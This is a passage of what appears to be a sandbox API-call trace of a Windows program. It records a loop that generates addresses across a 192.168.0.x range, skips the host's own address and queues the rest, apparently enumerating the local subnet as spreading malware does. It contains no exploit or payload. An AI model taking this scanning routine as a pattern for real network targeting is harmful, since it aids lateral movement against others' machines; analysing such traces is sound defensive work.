[0089.911] malloc (_Size=0x1c) returned 0x20732a0 [0089.911] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20732a0 | out: ListHead=0x1fa03e8, ListEntry=0x20732a0) returned 0x2073278 [0089.911] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.139") returned 13 [0089.911] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.139") returned 1 [0089.911] malloc (_Size=0x1c) returned 0x20732c8 [0089.911] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20732c8 | out: ListHead=0x1fa03e8, ListEntry=0x20732c8) returned 0x20732a0 [0089.911] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.140") returned 13 [0089.911] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.140") returned 1 [0089.911] malloc (_Size=0x1c) returned 0x20732f0 [0089.911] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20732f0 | out: ListHead=0x1fa03e8, ListEntry=0x20732f0) returned 0x20732c8 [0089.911] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.141") returned 13 [0089.911] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.141") returned 1 [0089.911] malloc (_Size=0x1c) returned 0x2073318 [0089.911] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073318 | out: ListHead=0x1fa03e8, ListEntry=0x2073318) returned 0x20732f0 [0089.911] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.142") returned 13 [0089.911] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.142") returned 1 [0089.911] malloc (_Size=0x1c) returned 0x2073340 [0089.911] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073340 | out: ListHead=0x1fa03e8, ListEntry=0x2073340) returned 0x2073318 [0089.911] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.143") returned 13 [0089.911] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.143") returned 1 [0089.911] malloc (_Size=0x1c) returned 0x2073368 [0089.911] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073368 | out: ListHead=0x1fa03e8, ListEntry=0x2073368) returned 0x2073340 [0089.911] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.144") returned 13 [0089.911] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.144") returned 1 [0089.911] malloc (_Size=0x1c) returned 0x2073390 [0089.911] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073390 | out: ListHead=0x1fa03e8, ListEntry=0x2073390) returned 0x2073368 [0089.912] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.145") returned 13 [0089.912] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.145") returned 0 [0089.912] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.146") returned 13 [0089.912] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.146") returned -1 [0089.912] malloc (_Size=0x1c) returned 0x20733b8 [0089.912] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20733b8 | out: ListHead=0x1fa03e8, ListEntry=0x20733b8) returned 0x2073390 [0089.912] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.147") returned 13 [0089.912] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.147") returned -1 [0089.912] malloc (_Size=0x1c) returned 0x20733e0 [0089.912] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20733e0 | out: ListHead=0x1fa03e8, ListEntry=0x20733e0) returned 0x20733b8 [0089.912] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.148") returned 13 [0089.912] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.148") returned -1 [0089.912] malloc (_Size=0x1c) returned 0x2073408 [0089.912] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073408 | out: ListHead=0x1fa03e8, ListEntry=0x2073408) returned 0x20733e0 [0089.912] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.149") returned 13 [0089.912] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.149") returned -1 [0089.912] malloc (_Size=0x1c) returned 0x2073430 [0089.912] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073430 | out: ListHead=0x1fa03e8, ListEntry=0x2073430) returned 0x2073408 [0089.912] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.150") returned 13 [0089.912] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.150") returned -1 [0089.912] malloc (_Size=0x1c) returned 0x2073458 [0089.912] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073458 | out: ListHead=0x1fa03e8, ListEntry=0x2073458) returned 0x2073430 [0089.912] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.151") returned 13 [0089.912] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.151") returned -1 [0089.912] malloc (_Size=0x1c) returned 0x2073480 [0089.912] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073480 | out: ListHead=0x1fa03e8, ListEntry=0x2073480) returned 0x2073458 [0089.913] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.152") returned 13 [0089.913] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.152") returned -1 [0089.913] malloc (_Size=0x1c) returned 0x20734a8 [0089.913] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20734a8 | out: ListHead=0x1fa03e8, ListEntry=0x20734a8) returned 0x2073480 [0089.913] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.153") returned 13 [0089.913] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.153") returned -1 [0089.913] malloc (_Size=0x1c) returned 0x20734d0 [0089.913] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20734d0 | out: ListHead=0x1fa03e8, ListEntry=0x20734d0) returned 0x20734a8 [0089.913] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.154") returned 13 [0089.913] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.154") returned -1 [0089.913] malloc (_Size=0x1c) returned 0x20734f8 [0089.913] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20734f8 | out: ListHead=0x1fa03e8, ListEntry=0x20734f8) returned 0x20734d0 [0089.913] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.155") returned 13 [0089.913] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.155") returned -1 [0089.913] malloc (_Size=0x1c) returned 0x2073520 [0089.913] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073520 | out: ListHead=0x1fa03e8, ListEntry=0x2073520) returned 0x20734f8 [0089.913] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.156") returned 13 [0089.913] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.156") returned -1 [0089.913] malloc (_Size=0x1c) returned 0x2073548 [0089.913] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073548 | out: ListHead=0x1fa03e8, ListEntry=0x2073548) returned 0x2073520 [0089.913] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.157") returned 13 [0089.913] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.157") returned -1 [0089.913] malloc (_Size=0x1c) returned 0x2073570 [0089.913] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073570 | out: ListHead=0x1fa03e8, ListEntry=0x2073570) returned 0x2073548 [0089.913] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.158") returned 13 [0089.913] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.158") returned -1 [0089.913] malloc (_Size=0x1c) returned 0x2073598 [0089.914] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073598 | out: ListHead=0x1fa03e8, ListEntry=0x2073598) returned 0x2073570 [0089.914] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.159") returned 13 [0089.914] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.159") returned -1 [0089.914] malloc (_Size=0x1c) returned 0x20735c0 [0089.914] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20735c0 | out: ListHead=0x1fa03e8, ListEntry=0x20735c0) returned 0x2073598 [0089.914] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.160") returned 13 [0089.914] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.160") returned -1 [0089.914] malloc (_Size=0x1c) returned 0x20735e8 [0089.914] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20735e8 | out: ListHead=0x1fa03e8, ListEntry=0x20735e8) returned 0x20735c0 [0089.914] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.161") returned 13 [0089.914] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.161") returned -1 [0089.914] malloc (_Size=0x1c) returned 0x2073610 [0089.914] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073610 | out: ListHead=0x1fa03e8, ListEntry=0x2073610) returned 0x20735e8 [0089.914] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.162") returned 13 [0089.914] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.162") returned -1 [0089.914] malloc (_Size=0x1c) returned 0x2073638 [0089.914] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073638 | out: ListHead=0x1fa03e8, ListEntry=0x2073638) returned 0x2073610 [0089.914] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.163") returned 13 [0089.914] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.163") returned -1 [0089.914] malloc (_Size=0x1c) returned 0x2073660 [0089.914] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073660 | out: ListHead=0x1fa03e8, ListEntry=0x2073660) returned 0x2073638 [0089.914] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.164") returned 13 [0089.914] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.164") returned -1 [0089.914] malloc (_Size=0x1c) returned 0x2073688 [0089.914] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073688 | out: ListHead=0x1fa03e8, ListEntry=0x2073688) returned 0x2073660 [0089.914] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.165") returned 13 [0089.914] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.165") returned -1 [0089.914] malloc (_Size=0x1c) returned 0x20736b0 [0089.915] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20736b0 | out: ListHead=0x1fa03e8, ListEntry=0x20736b0) returned 0x2073688 [0089.915] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.166") returned 13 [0089.915] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.166") returned -1 [0089.915] malloc (_Size=0x1c) returned 0x20736d8 [0089.915] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20736d8 | out: ListHead=0x1fa03e8, ListEntry=0x20736d8) returned 0x20736b0 [0089.915] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.167") returned 13 [0089.915] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.167") returned -1 [0089.915] malloc (_Size=0x1c) returned 0x2073700 [0089.915] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073700 | out: ListHead=0x1fa03e8, ListEntry=0x2073700) returned 0x20736d8 [0089.915] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.168") returned 13 [0089.915] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.168") returned -1 [0089.915] malloc (_Size=0x1c) returned 0x2073758 [0089.915] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073758 | out: ListHead=0x1fa03e8, ListEntry=0x2073758) returned 0x2073700 [0089.915] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.169") returned 13 [0089.915] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.169") returned -1 [0089.915] malloc (_Size=0x1c) returned 0x2073780 [0089.915] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073780 | out: ListHead=0x1fa03e8, ListEntry=0x2073780) returned 0x2073758 [0089.915] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.170") returned 13 [0089.915] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.170") returned -1 [0089.915] malloc (_Size=0x1c) returned 0x20737a8 [0089.915] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20737a8 | out: ListHead=0x1fa03e8, ListEntry=0x20737a8) returned 0x2073780 [0089.915] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.171") returned 13 [0089.915] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.171") returned -1 [0089.915] malloc (_Size=0x1c) returned 0x20737d0 [0089.915] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20737d0 | out: ListHead=0x1fa03e8, ListEntry=0x20737d0) returned 0x20737a8 [0089.915] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.172") returned 13 [0089.916] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.172") returned -1 [0089.916] malloc (_Size=0x1c) returned 0x20737f8 [0089.916] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20737f8 | out: ListHead=0x1fa03e8, ListEntry=0x20737f8) returned 0x20737d0 [0089.916] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.173") returned 13 [0089.916] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.173") returned -1 [0089.916] malloc (_Size=0x1c) returned 0x2073820 [0089.916] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073820 | out: ListHead=0x1fa03e8, ListEntry=0x2073820) returned 0x20737f8 [0089.916] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.174") returned 13 [0089.916] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.174") returned -1 [0089.916] malloc (_Size=0x1c) returned 0x2073848 [0089.916] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073848 | out: ListHead=0x1fa03e8, ListEntry=0x2073848) returned 0x2073820 [0089.916] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.175") returned 13 [0089.916] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.175") returned -1 [0089.916] malloc (_Size=0x1c) returned 0x2073870 [0089.916] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073870 | out: ListHead=0x1fa03e8, ListEntry=0x2073870) returned 0x2073848 [0089.916] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.176") returned 13 [0089.916] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.176") returned -1 [0089.916] malloc (_Size=0x1c) returned 0x2073898 [0089.916] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073898 | out: ListHead=0x1fa03e8, ListEntry=0x2073898) returned 0x2073870 [0089.916] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.177") returned 13 [0089.916] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.177") returned -1 [0089.916] malloc (_Size=0x1c) returned 0x20738c0 [0089.916] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20738c0 | out: ListHead=0x1fa03e8, ListEntry=0x20738c0) returned 0x2073898 [0089.916] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.178") returned 13 [0089.916] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.178") returned -1 [0089.917] malloc (_Size=0x1c) returned 0x20738e8 [0089.917] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20738e8 | out: ListHead=0x1fa03e8, ListEntry=0x20738e8) returned 0x20738c0 [0089.917] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.179") returned 13 [0089.917] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.179") returned -1 [0089.917] malloc (_Size=0x1c) returned 0x2073910 [0089.917] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073910 | out: ListHead=0x1fa03e8, ListEntry=0x2073910) returned 0x20738e8 [0089.917] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.180") returned 13 [0089.917] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.180") returned -1 [0089.917] malloc (_Size=0x1c) returned 0x2073938 [0089.917] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073938 | out: ListHead=0x1fa03e8, ListEntry=0x2073938) returned 0x2073910 [0089.917] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.181") returned 13 [0089.917] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.181") returned -1 [0089.917] malloc (_Size=0x1c) returned 0x2073960 [0089.917] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073960 | out: ListHead=0x1fa03e8, ListEntry=0x2073960) returned 0x2073938 [0089.917] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.182") returned 13 [0089.917] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.182") returned -1 [0089.917] malloc (_Size=0x1c) returned 0x2073988 [0089.917] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073988 | out: ListHead=0x1fa03e8, ListEntry=0x2073988) returned 0x2073960 [0089.917] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.183") returned 13 [0089.917] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.183") returned -1 [0089.917] malloc (_Size=0x1c) returned 0x20739b0 [0089.917] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20739b0 | out: ListHead=0x1fa03e8, ListEntry=0x20739b0) returned 0x2073988 [0089.917] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.184") returned 13 [0089.917] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.184") returned -1 [0089.917] malloc (_Size=0x1c) returned 0x20739d8 [0089.917] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20739d8 | out: ListHead=0x1fa03e8, ListEntry=0x20739d8) returned 0x20739b0 [0089.917] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.185") returned 13 [0089.917] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.185") returned -1 [0089.918] malloc (_Size=0x1c) returned 0x2073a00 [0089.918] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073a00 | out: ListHead=0x1fa03e8, ListEntry=0x2073a00) returned 0x20739d8 [0089.918] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.186") returned 13 [0089.918] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.186") returned -1 [0089.918] malloc (_Size=0x1c) returned 0x2073a28 [0089.918] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073a28 | out: ListHead=0x1fa03e8, ListEntry=0x2073a28) returned 0x2073a00 [0089.918] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.187") returned 13 [0089.918] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.187") returned -1 [0089.918] malloc (_Size=0x1c) returned 0x2073a50 [0089.918] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073a50 | out: ListHead=0x1fa03e8, ListEntry=0x2073a50) returned 0x2073a28 [0089.918] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.188") returned 13 [0089.918] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.188") returned -1 [0089.918] malloc (_Size=0x1c) returned 0x2073a78 [0089.918] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073a78 | out: ListHead=0x1fa03e8, ListEntry=0x2073a78) returned 0x2073a50 [0089.918] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.189") returned 13 [0089.918] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.189") returned -1 [0089.918] malloc (_Size=0x1c) returned 0x2073aa0 [0089.918] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073aa0 | out: ListHead=0x1fa03e8, ListEntry=0x2073aa0) returned 0x2073a78 [0089.918] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.190") returned 13 [0089.918] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.190") returned -1 [0089.918] malloc (_Size=0x1c) returned 0x2073ac8 [0089.918] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073ac8 | out: ListHead=0x1fa03e8, ListEntry=0x2073ac8) returned 0x2073aa0 [0089.918] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.191") returned 13 [0089.918] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.191") returned -1 [0089.918] malloc (_Size=0x1c) returned 0x2073af0 [0089.918] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073af0 | out: ListHead=0x1fa03e8, ListEntry=0x2073af0) returned 0x2073ac8 [0089.918] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.192") returned 13 [0089.919] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.192") returned -1 [0089.919] malloc (_Size=0x1c) returned 0x2073b18 [0089.919] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073b18 | out: ListHead=0x1fa03e8, ListEntry=0x2073b18) returned 0x2073af0 [0089.919] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.193") returned 13 [0089.919] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.193") returned -1 [0089.919] malloc (_Size=0x1c) returned 0x2073b40 [0089.919] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073b40 | out: ListHead=0x1fa03e8, ListEntry=0x2073b40) returned 0x2073b18 [0089.919] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.194") returned 13 [0089.919] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.194") returned -1 [0089.919] malloc (_Size=0x1c) returned 0x2073b68 [0089.919] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073b68 | out: ListHead=0x1fa03e8, ListEntry=0x2073b68) returned 0x2073b40 [0089.919] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.195") returned 13 [0089.919] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.195") returned -1 [0089.919] malloc (_Size=0x1c) returned 0x2073b90 [0089.919] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073b90 | out: ListHead=0x1fa03e8, ListEntry=0x2073b90) returned 0x2073b68 [0089.919] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.196") returned 13 [0089.919] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.196") returned -1 [0089.919] malloc (_Size=0x1c) returned 0x2073bb8 [0089.919] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073bb8 | out: ListHead=0x1fa03e8, ListEntry=0x2073bb8) returned 0x2073b90 [0089.919] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.197") returned 13 [0089.919] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.197") returned -1 [0089.919] malloc (_Size=0x1c) returned 0x2073be0 [0089.919] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073be0 | out: ListHead=0x1fa03e8, ListEntry=0x2073be0) returned 0x2073bb8 [0089.919] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.198") returned 13 [0089.919] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.198") returned -1 [0089.919] malloc (_Size=0x1c) returned 0x2073c08 [0089.920] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073c08 | out: ListHead=0x1fa03e8, ListEntry=0x2073c08) returned 0x2073be0 [0089.920] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.199") returned 13 [0089.920] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.199") returned -1 [0089.920] malloc (_Size=0x1c) returned 0x2073c30 [0089.920] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073c30 | out: ListHead=0x1fa03e8, ListEntry=0x2073c30) returned 0x2073c08 [0089.920] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.200") returned 13 [0089.920] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.200") returned -1 [0089.920] malloc (_Size=0x1c) returned 0x2073c58 [0089.920] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073c58 | out: ListHead=0x1fa03e8, ListEntry=0x2073c58) returned 0x2073c30 [0089.920] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.201") returned 13 [0089.920] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.201") returned -1 [0089.920] malloc (_Size=0x1c) returned 0x2073c80 [0089.920] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073c80 | out: ListHead=0x1fa03e8, ListEntry=0x2073c80) returned 0x2073c58 [0089.920] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.202") returned 13 [0089.920] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.202") returned -1 [0089.920] malloc (_Size=0x1c) returned 0x2073ca8 [0089.920] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073ca8 | out: ListHead=0x1fa03e8, ListEntry=0x2073ca8) returned 0x2073c80 [0089.920] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.203") returned 13 [0089.920] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.203") returned -1 [0089.920] malloc (_Size=0x1c) returned 0x2073cd0 [0089.920] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073cd0 | out: ListHead=0x1fa03e8, ListEntry=0x2073cd0) returned 0x2073ca8 [0089.920] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.204") returned 13 [0089.920] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.204") returned -1 [0089.920] malloc (_Size=0x1c) returned 0x2073cf8 [0089.920] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073cf8 | out: ListHead=0x1fa03e8, ListEntry=0x2073cf8) returned 0x2073cd0 [0089.920] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.205") returned 13 [0089.921] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.205") returned -1 [0089.921] malloc (_Size=0x1c) returned 0x2073d20 [0089.921] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073d20 | out: ListHead=0x1fa03e8, ListEntry=0x2073d20) returned 0x2073cf8 [0089.921] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.206") returned 13 [0089.921] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.206") returned -1 [0089.921] malloc (_Size=0x1c) returned 0x2073d48 [0089.921] 